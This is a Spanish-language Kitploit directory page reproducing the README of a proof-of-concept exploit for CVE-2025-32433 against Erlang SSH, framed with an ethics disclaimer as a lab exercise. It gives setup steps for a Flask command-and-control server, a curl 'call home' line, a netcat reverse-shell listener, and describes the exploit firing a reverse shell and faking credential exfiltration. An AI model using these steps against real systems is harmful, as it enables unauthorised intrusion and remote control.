Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC_CVE-2025-32433 — Exploit de prueba de concepto para CVE-2025-32433 con modos de ataque simulados y reales, incluyendo un servidor C2 basado en Flask para callbacks de shell inversa y simulación post-explotación. | Kitploit
Herramientas/GitHubGitHub/ekomssavior/poc_cve-2025-32433
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

Exploit de prueba de concepto para CVE-2025-32433 con modos de ataque simulados y reales, incluyendo un servidor C2 basado en Flask para callbacks de shell inversa y simulación post-explotación.

Ver Repositorio
5214hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚠️ Aviso ético

Este repositorio contiene código que demuestra un CVE real (CVE-2025-32433).
Úsalo solo en entornos donde tengas autorización explícita.

Nunca pruebes este exploit contra sistemas que no poseas o administres.
El uso no autorizado es ilegal, poco ético y perjudicial para la comunidad de ciberseguridad.

PoC simulado y real para CVE-2025-32433

Mi colega Chocapikk me mostró este PoC encontrado, erling_cve.py. Me intrigó y quería probarlo en un entorno seguro.

Tienes dos opciones con este repositorio: el script simulado seguro y el sistema que describo a continuación.

o puedes utilizar el de verdad, erling_cve.py (de forma ética, con precaución y solo en redes donde tengas permiso para hacer pruebas).

Antes de usar esta herramienta para probar o ejecutar un exploit real, échale un vistazo a mi colega m0usemm0use y a su script de Python para encontrar objetivos vulnerables a CVE-2025-32433!!!!

https://github.com/m0usem0use/erl_mouse


VERSIÓN SIMULADA del exploit para cve-2025-32433

Configurar el servidor C2

construye un C2 basado en Python Flask: potente para callbacks de bots o reverse shells.

Ejecuta este script de configuración en el servidor C2

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (pega el script c2_server y edítalo según sea necesario)

ejecuta

python3 c2_server.py

los bots (o scripts de prueba) pueden hacer curl a casa así

curl -X POST http://:8080/report -d "Bot is online"

Configurar el venv de Python en Kali

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Crea un entorno virtual de Python

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

Probar el callback

nano test_callback.py (pega el script test_callback y edítalo según sea necesario)

ejecuta el callback

python3 test_callback.py

Ahora oficialmente tienes

Un venv funcional

Un C2 en la nube en vivo

Inyección de callback funcional

  • Necesitas que la máquina objetivo/víctima tenga un proceso o servicio de Erlang expuesto (o simulado)

¿QUÉ HACE Eerling_cve.py?

Conecta al puerto 22 de una IP objetivo

Envía una cadena de versión SSH falsa

Envía un paquete manipulado (probablemente para desencadenar una vulnerabilidad — simulando abusar de algo como el manejador SSH no documentado de Erlang o un desbordamiento de búfer)

Dispara una reverse shell de vuelta a la IP del atacante

Simula la post-explotación ejecutando comandos como whoami, uname y una falsa "exfiltración de credenciales" a /tmp/exfil.log

Tomaremos nuestro PoC encontrado tipo Erlang y

Lo haremos funcional dentro del venv de Kali

Lo conectaremos para que informe a nuestro C2 en la nube cuando se ejecute el "ataque"

Lo ejecutaremos de forma ética y segura dentro de un laboratorio controlado

Observaremos cómo genera /tmp/exfil.log para simular datos robados


desde la máquina Kali

nano poc_erlang_test.py

-pega en poc_erlang_test.py y edítalo según sea necesario

Abre un Listener

en una nueva terminal ejecuta

nc -lvnp 4444

ejecuta el PoC

python poc_erlang_test.py --real

Descargar herramienta